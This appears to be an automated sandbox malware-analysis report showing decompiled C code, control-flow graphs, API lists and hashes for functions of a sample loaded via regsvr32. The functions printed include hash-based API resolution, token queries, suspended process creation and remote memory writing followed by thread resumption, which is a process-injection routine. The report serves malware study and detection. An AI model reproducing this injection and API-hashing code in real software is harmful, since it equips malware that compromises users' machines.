                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 191 536eebb-536eed2 192 536eed4-536eefc 191->192 193 536ef2f 191->193 192->193 195 536eefe-536ef21 call 536a43d call 536e2c5 192->195 194 536ef31-536ef35 193->194 200 536ef36-536ef4d 195->200 201 536ef23-536ef2d 195->201 202 536efa3-536efa5 200->202 203 536ef4f-536ef57 200->203 201->193 201->195 202->194 203->202 204 536ef59 203->204 205 536ef5b-536ef61 204->205 206 536ef63-536ef65 205->206 207 536ef71-536ef82 205->207 206->207 208 536ef67-536ef6f 206->208 209 536ef87-536ef93 LoadLibraryA 207->209 210 536ef84-536ef85 207->210 208->205 208->207 209->193 211 536ef95-536ef9f GetProcAddress 209->211 210->209 211->193 212 536efa1 211->212 212->194
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536EEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0536E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0536A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                        0x0536eec4
                                                                                                                                                                        0x0536eec6
                                                                                                                                                                        0x0536eec9
                                                                                                                                                                        0x0536eecc
                                                                                                                                                                        0x0536eed2
                                                                                                                                                                        0x0536ef2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef2f
                                                                                                                                                                        0x0536eed4
                                                                                                                                                                        0x0536eedf
                                                                                                                                                                        0x0536eee2
                                                                                                                                                                        0x0536eee7
                                                                                                                                                                        0x0536eeec
                                                                                                                                                                        0x0536eeef
                                                                                                                                                                        0x0536eef1
                                                                                                                                                                        0x0536eef4
                                                                                                                                                                        0x0536eef7
                                                                                                                                                                        0x0536eefc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536eefe
                                                                                                                                                                        0x0536eefe
                                                                                                                                                                        0x0536ef10
                                                                                                                                                                        0x0536ef1d
                                                                                                                                                                        0x0536ef21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef23
                                                                                                                                                                        0x0536ef26
                                                                                                                                                                        0x0536ef27
                                                                                                                                                                        0x0536ef2d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef2d
                                                                                                                                                                        0x0536ef44
                                                                                                                                                                        0x0536ef49
                                                                                                                                                                        0x0536ef4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef59
                                                                                                                                                                        0x0536ef59
                                                                                                                                                                        0x0536ef5b
                                                                                                                                                                        0x0536ef5b
                                                                                                                                                                        0x0536ef61
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef67
                                                                                                                                                                        0x0536ef6b
                                                                                                                                                                        0x0536ef6f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef6f
                                                                                                                                                                        0x0536ef75
                                                                                                                                                                        0x0536ef7d
                                                                                                                                                                        0x0536ef82
                                                                                                                                                                        0x0536ef85
                                                                                                                                                                        0x0536ef85
                                                                                                                                                                        0x0536ef87
                                                                                                                                                                        0x0536ef8b
                                                                                                                                                                        0x0536ef93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef97
                                                                                                                                                                        0x0536ef9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536ef9f

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0536EF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0536EF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 681fc1b796ac05a545f4d6f62a645a986cb46490afbc6e10f41d90ff1ad7ea5e
                                                                                                                                                                        • Instruction ID: 5d5d705cec49fc0faf25048e460b792f0da08705dc3f71aa9ec3c581fd143414
                                                                                                                                                                        • Opcode Fuzzy Hash: 681fc1b796ac05a545f4d6f62a645a986cb46490afbc6e10f41d90ff1ad7ea5e
                                                                                                                                                                        • Instruction Fuzzy Hash: D931D639A141169FCB24CFADC4846AFBBF9BF44304F25846DD805EB344DB70D94597A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536C7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 213 536c7f5-536c815 GetTokenInformation 214 536c817-536c820 GetLastError 213->214 215 536c85b 213->215 214->215 216 536c822-536c832 call 5368bde 214->216 217 536c85d-536c861 215->217 220 536c834-536c836 216->220 221 536c838-536c84b GetTokenInformation 216->221 220->217 221->215 222 536c84d-536c859 call 5368bf4 221->222 222->220
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E0536C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E05368BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E05368BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                        0x0536c7f8
                                                                                                                                                                        0x0536c7f9
                                                                                                                                                                        0x0536c800
                                                                                                                                                                        0x0536c808
                                                                                                                                                                        0x0536c80c
                                                                                                                                                                        0x0536c815
                                                                                                                                                                        0x0536c85b
                                                                                                                                                                        0x0536c85b
                                                                                                                                                                        0x0536c822
                                                                                                                                                                        0x0536c82a
                                                                                                                                                                        0x0536c82c
                                                                                                                                                                        0x0536c832
                                                                                                                                                                        0x0536c84b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c84d
                                                                                                                                                                        0x0536c852
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c858
                                                                                                                                                                        0x0536c834
                                                                                                                                                                        0x0536c834
                                                                                                                                                                        0x0536c834
                                                                                                                                                                        0x0536c834
                                                                                                                                                                        0x0536c832
                                                                                                                                                                        0x0536c861

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05360000,00000000,00000000,?,0536C876,00000000,00000000,?,0536C89F), ref: 0536C810
                                                                                                                                                                        • GetLastError.KERNEL32(?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C817
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: aa75e85708d29e27d100307026e3cc1d963178f133cc77492ad1b22f8f047b61
                                                                                                                                                                        • Instruction ID: 4cefb5c1eb022a4341c0212fb86a86d9f706388b6478944ab1f3bb722b535680
                                                                                                                                                                        • Opcode Fuzzy Hash: aa75e85708d29e27d100307026e3cc1d963178f133cc77492ad1b22f8f047b61
                                                                                                                                                                        • Instruction Fuzzy Hash: 0101A772A0011CBF8B319BA5DC49DAB7FEDFE496A0B10556DF509D6115D670DD00C7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536BC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 225 536bc84-536bcd3 call 5368d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E0536BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E05368D6D(__edx, 0, 0x10);
				E05368D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                        0x0536bc95
                                                                                                                                                                        0x0536bca2
                                                                                                                                                                        0x0536bcaa
                                                                                                                                                                        0x0536bcc6
                                                                                                                                                                        0x0536bccc
                                                                                                                                                                        0x0536bcd3

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0536BCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 1ef2a2c88e4b3bd596cb7fbc7abf75bb0991130c1b0aca7dff8d5104a926613a
                                                                                                                                                                        • Instruction ID: 6223b880c7a4492ea1989ac386d2c5cef4682c16a390d3e23a871fd313b78229
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef2a2c88e4b3bd596cb7fbc7abf75bb0991130c1b0aca7dff8d5104a926613a
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F030F16402087EF720EA659C0AFBF7AACDB45710F504129BA05EB1C0EAA0AD4582B5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536D804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 230 536d804-536d824 call 536d6dc 233 536d955-536d958 230->233 234 536d82a-536d849 call 536b557 230->234 237 536d945-536d954 call 5368bf4 234->237 238 536d84f-536d851 234->238 237->233 239 536d857-536d859 238->239 240 536d933-536d943 call 5368bf4 238->240 242 536d85c-536d85e 239->242 240->237 245 536d864-536d883 call 5368d6d call 536bc84 242->245 246 536d921-536d92d 242->246 252 536d8e5-536d8e9 245->252 253 536d885-536d898 call 536d959 245->253 246->238 246->240 254 536d914-536d91b 252->254 255 536d8eb-536d8ed 252->255 253->252 260 536d89a-536d8b2 253->260 254->242 254->246 257 536d8fe-536d90e 255->257 258 536d8ef-536d8f5 255->258 257->254 258->257 263 536d8b4-536d8c9 GetLastError call 536da57 260->263 264 536d8e2 260->264 267 536d8de-536d8df FindCloseChangeNotification 263->267 268 536d8cb-536d8d6 263->268 264->252 267->264 270 536d8d8 268->270 271 536d8d9 268->271 270->271 271->267
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E0536D804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0536D6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x537f81c; // 0x546fbe8
				_t7 = _t38 + 0xac; // 0x7fc38876
				E0536B557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E05368BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E05368D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0536BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0536D959(E053661C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x537f818; // 0x546f8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0536DA57( &_v40);
									_t63 =  *0x537f818; // 0x546f8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x537f818; // 0x546f8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x537f818; // 0x546f8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x537f818; // 0x546f8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x537f818; // 0x546f8b0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E05368BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                        0x0536d80a
                                                                                                                                                                        0x0536d813
                                                                                                                                                                        0x0536d816
                                                                                                                                                                        0x0536d818
                                                                                                                                                                        0x0536d81d
                                                                                                                                                                        0x0536d81f
                                                                                                                                                                        0x0536d822
                                                                                                                                                                        0x0536d824
                                                                                                                                                                        0x0536d958
                                                                                                                                                                        0x0536d958
                                                                                                                                                                        0x0536d82a
                                                                                                                                                                        0x0536d833
                                                                                                                                                                        0x0536d83c
                                                                                                                                                                        0x0536d841
                                                                                                                                                                        0x0536d844
                                                                                                                                                                        0x0536d849
                                                                                                                                                                        0x0536d945
                                                                                                                                                                        0x0536d94b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d954
                                                                                                                                                                        0x0536d84f
                                                                                                                                                                        0x0536d857
                                                                                                                                                                        0x0536d859
                                                                                                                                                                        0x0536d85c
                                                                                                                                                                        0x0536d86b
                                                                                                                                                                        0x0536d876
                                                                                                                                                                        0x0536d87c
                                                                                                                                                                        0x0536d881
                                                                                                                                                                        0x0536d883
                                                                                                                                                                        0x0536d890
                                                                                                                                                                        0x0536d898
                                                                                                                                                                        0x0536d8a3
                                                                                                                                                                        0x0536d8ae
                                                                                                                                                                        0x0536d8b2
                                                                                                                                                                        0x0536d8b4
                                                                                                                                                                        0x0536d8bd
                                                                                                                                                                        0x0536d8c4
                                                                                                                                                                        0x0536d8c9
                                                                                                                                                                        0x0536d8cb
                                                                                                                                                                        0x0536d8d0
                                                                                                                                                                        0x0536d8d6
                                                                                                                                                                        0x0536d8d8
                                                                                                                                                                        0x0536d8d8
                                                                                                                                                                        0x0536d8d9
                                                                                                                                                                        0x0536d8d9
                                                                                                                                                                        0x0536d8df
                                                                                                                                                                        0x0536d8df
                                                                                                                                                                        0x0536d8e2
                                                                                                                                                                        0x0536d8e2
                                                                                                                                                                        0x0536d898
                                                                                                                                                                        0x0536d8e9
                                                                                                                                                                        0x0536d8ed
                                                                                                                                                                        0x0536d8ef
                                                                                                                                                                        0x0536d8f8
                                                                                                                                                                        0x0536d8f8
                                                                                                                                                                        0x0536d8fe
                                                                                                                                                                        0x0536d906
                                                                                                                                                                        0x0536d909
                                                                                                                                                                        0x0536d911
                                                                                                                                                                        0x0536d911
                                                                                                                                                                        0x0536d914
                                                                                                                                                                        0x0536d915
                                                                                                                                                                        0x0536d91b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d91b
                                                                                                                                                                        0x0536d924
                                                                                                                                                                        0x0536d927
                                                                                                                                                                        0x0536d928
                                                                                                                                                                        0x0536d92d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d933
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d933
                                                                                                                                                                        0x0536d933
                                                                                                                                                                        0x0536d936
                                                                                                                                                                        0x0536d93c
                                                                                                                                                                        0x0536d940

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                          • Part of subcall function 0536BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0536BCC6
                                                                                                                                                                          • Part of subcall function 0536D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0536D9BB
                                                                                                                                                                          • Part of subcall function 0536D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0536DA04
                                                                                                                                                                          • Part of subcall function 0536D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0536DA21
                                                                                                                                                                          • Part of subcall function 0536D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0536DA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 0536D8B4
                                                                                                                                                                          • Part of subcall function 0536DA57: ResumeThread.KERNELBASE(?,0536D8C2,?,?,00000001), ref: 0536DA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0536D8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: 0cebede1d8fa62d3768291b1b1267fa6d0d5b70037270831af7ff50ea6873f6b
                                                                                                                                                                        • Instruction ID: b62e2415f4f859450646d5e79652c48b8011dabed605448a953a476ea6795325
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cebede1d8fa62d3768291b1b1267fa6d0d5b70037270831af7ff50ea6873f6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C416D72B10209AFCB11DFA5D989EADBBF9FF48310F10846DE506E7259DB709A418B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053664EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x537f818; // 0x546f8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E05368BC9();
				E05369591();
				 *0x537f830 = _a4;
				E05373CD5(_a4);
				 *_t49 = 0xf43;
				 *0x537f818 = E0536F05C(0x537ca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E05369DF2(0x537ca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E05368BAF();
					 *_t49 = 0x40e;
					_t28 = E05369CB5(E0536109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x537f828 = E0536F05C(0x537cbb8, _t48);
						E05366370(_t48, __eflags);
						E05368BF4( &_a8, 0xfffffffe);
						_t36 =  *0x537f818; // 0x546f8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E05366298, 0, 0,  &_v8);
					 *0x537f83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E05368BAF();
				goto L3;
			}













                                                                                                                                                                        0x053664f2
                                                                                                                                                                        0x053664f7
                                                                                                                                                                        0x053665db
                                                                                                                                                                        0x053665df
                                                                                                                                                                        0x053665d4
                                                                                                                                                                        0x053665d6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053665d6
                                                                                                                                                                        0x053665e1
                                                                                                                                                                        0x053665eb
                                                                                                                                                                        0x05366556
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05366556
                                                                                                                                                                        0x053664fd
                                                                                                                                                                        0x05366502
                                                                                                                                                                        0x0536650b
                                                                                                                                                                        0x05366510
                                                                                                                                                                        0x0536651a
                                                                                                                                                                        0x0536652b
                                                                                                                                                                        0x05366530
                                                                                                                                                                        0x05366537
                                                                                                                                                                        0x0536653c
                                                                                                                                                                        0x0536653e
                                                                                                                                                                        0x05366541
                                                                                                                                                                        0x0536654d
                                                                                                                                                                        0x0536654e
                                                                                                                                                                        0x0536655a
                                                                                                                                                                        0x0536655f
                                                                                                                                                                        0x0536656e
                                                                                                                                                                        0x05366573
                                                                                                                                                                        0x05366576
                                                                                                                                                                        0x05366578
                                                                                                                                                                        0x05366581
                                                                                                                                                                        0x0536658c
                                                                                                                                                                        0x05366591
                                                                                                                                                                        0x0536659c
                                                                                                                                                                        0x053665a1
                                                                                                                                                                        0x053665ab
                                                                                                                                                                        0x053665ab
                                                                                                                                                                        0x053665c5
                                                                                                                                                                        0x053665c8
                                                                                                                                                                        0x053665cb
                                                                                                                                                                        0x053665d0
                                                                                                                                                                        0x053665d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053665d2
                                                                                                                                                                        0x05366550
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,05366502), ref: 05368BD2
                                                                                                                                                                          • Part of subcall function 0536F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 05366541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,05366298,00000000,00000000,?), ref: 053665C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: b7c9130599aae25071714cf571934ab03a0dc6ce584ae39351a8b66a637436b2
                                                                                                                                                                        • Instruction ID: e91b5a0308e9d31b58c52716542dc86483a45aa24da1da7f8ed09025abe72427
                                                                                                                                                                        • Opcode Fuzzy Hash: b7c9130599aae25071714cf571934ab03a0dc6ce584ae39351a8b66a637436b2
                                                                                                                                                                        • Instruction Fuzzy Hash: AF213DB1A14208ABDB14BF74D84BAA93BE8AB04350F10C52DF619CA188DFB4D5818B65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536F05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
